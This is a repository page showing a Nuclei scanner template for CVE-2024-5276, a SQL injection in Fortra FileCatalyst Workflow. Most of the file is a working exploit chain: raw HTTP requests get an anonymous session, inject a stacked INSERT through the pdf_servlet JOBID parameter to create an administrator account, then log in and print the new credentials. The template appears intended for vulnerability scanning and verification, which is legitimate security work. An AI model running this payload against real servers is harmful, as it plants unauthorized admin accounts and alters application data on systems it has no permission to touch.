daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2024/CVE-2024-5276.yaml

135 lines
5.1 KiB
YAML
Raw Blame History

This file contains invisible Unicode characters!

This file contains invisible Unicode characters that may be processed differently from what appears below. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to reveal hidden characters.

id: CVE-2024-5276
info:
name: Fortra FileCatalyst Workflow <= v5.1.6 - SQL Injection
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
A SQL Injection vulnerability in Fortra FileCatalyst Workflow allows an attacker to modify application data.  Likely impacts include creation of administrative users and deletion or modification of data in the application database. Data exfiltration via SQL injection is not possible using this vulnerability. Successful unauthenticated exploitation requires a Workflow system with anonymous access enabled, otherwise an authenticated user is required. This issue affects all versions of FileCatalyst Workflow from 5.1.6 Build 135 and earlier.
reference:
- https://www.tenable.com/security/research/tra-2024-25
- https://support.fortra.com/filecatalyst/kb-articles/advisory-6-24-2024-filecatalyst-workflow-sql-injection-vulnerability-YmYwYWY4OTYtNTUzMi1lZjExLTg0MGEtNjA0NWJkMDg3MDA0
- https://www.fortra.com/security/advisory/fi-2024-008
- https://nvd.nist.gov/vuln/detail/CVE-2024-5276
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-5276
cwe-id: CWE-20
epss-score: 0.00198
epss-percentile: 0.57788
metadata:
max-request: 6
verified: true
fofa-query: body="FileCatalyst file transfer solution, easily transfer large files"
tags: cve,cve2024,sqli,auth-bypass,fortra,filecatalyst,instrusive,sqli
variables:
ctxpath: "workflow"
username: "{{randstr}}"
password: '{{randstr_2}}'
password_enc: "{{to_upper(md5(password))}}"
payload: "1';INSERT INTO DOCTERA_USERS (USERNAME, PASSWORD, ENCPASSWORD, FIRSTNAME, LASTNAME, COMPANY, ADDRESS, ADDRESS2, CITY, STATE, ALTPHONE, ZIP, COUNTRY, PHONE, FAX, EMAIL, LASTLOGIN, CREATION, PREFERREDSERVER, CREDITCARDTYPE, CREDITCARDNUMBER, CREDITCARDEXPIRY, ACCOUNTSTATUS, USERTYPE, COMMENT, ADMIN, SUPERADMIN, ACCEPTEMAIL, ALLOWHOTFOLDER, PROTOCOL, BANDWIDTH, DIRECTORY, SLOWSTARTRATE, USESLOWSTART, SLOWSTARTAGGRESSIONRATE, BLOCKSIZE, UNITSIZE, NUMENCODERS, NUMFTPSTREAMS, ALLOWUSERBANDWIDTHTUNING, EXPIRYDATE, ALLOWTEMPACCOUNTCREATION, OWNERUSERNAME, USERLEVEL, UPLOADMETHOD, PW_CHANGEABLE, PW_CREATIONDATE, PW_DAYSBEFOREEXPIRE, PW_MUSTCHANGE, PW_USEDPASSWORDS, PW_NUMERRORS) VALUES('{{to_lower(username)}}', NULL, '{{password_enc}}', '{{to_lower(username)}}FirstName', '{{to_lower(username)}}LastName', '', '', '', '', '', '', '', '', '202-404-2400', '', '{{to_lower(username)}}@mydomain.local', 1714014839723, 1714013661166, 'default', '', '', '', 'full access', '', '', 1, 0, 0, 0, 'DEFAULT', '0', 0, '0', 1, '', '', '', '', '', 0, 0, 0, '', 0, 'DEFAULT', 0, 1714014752270, -1, 0, NULL, 0);-- -"
http:
- raw:
- |
GET /{{ctxpath}}/ HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
group: 1
name: jsessionid
regex:
- 'logon.jsp;jsessionid=([A-Z0-9]+)'
internal: true
- raw:
- |
GET /{{ctxpath}}/jsp/logon.jsp;jsessionid={{jsessionid}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'logonAnonymous.do'
internal: true
extractors:
- type: regex
part: body
group: 1
name: anonurl
regex:
- 'href="(.*)" class="btn btn-outline-primary" id="logonAnonymousLink"'
internal: true
- raw:
- |
GET {{anonurl}} HTTP/1.1
Host: {{Hostname}}
- raw:
- |
GET /{{ctxpath}}/servlet/pdf_servlet?JOBID={{urlencode(payload)}} HTTP/1.1
Host: {{Hostname}}
- raw:
- |
GET /{{ctxpath}}/jsp/logon.jsp HTTP/1.1
Host: {{Hostname}}
disable-cookie: true
extractors:
- type: regex
part: body
group: 1
name: fcweb_token
regex:
- 'name="FCWEB.FORM.TOKEN" value="([A-Za-z0-9]+)"'
internal: true
- type: regex
part: body
group: 1
name: jsessionid2
regex:
- 'logon.jsp;jsessionid=([A-Z0-9]+)'
internal: true
- raw:
- |
POST /{{ctxpath}}/logon.do HTTP/1.1
Host: {{Hostname}}
Cookie: JSESSIONID={{jsessionid2}}
Content-Type: application/x-www-form-urlencoded
FCWEB.FORM.TOKEN={{fcweb_token}}&username={{to_lower(username)}}&password={{password}}&submit=Login&
disable-cookie: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'username/password are not correct'
- 'Your session timed out.'
negative: true
- type: word
part: body
words:
- '<title>FileCatalyst Workflow Administration</title>'
- '{{to_lower(username)}}'
condition: and
extractors:
- type: dsl
dsl:
- '"USER: "+ username'
- '"PASS: "+ password'
# digest: 4b0a00483046022100f22dc8c52116835e08760a2476f93ba59a3bd4be7402180d8aec08b7c5f5f5a5022100e6ee803e8c6f7aeb8e6da5ce715264ff5df91e19866b9d8c9e2849220f60bd52:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink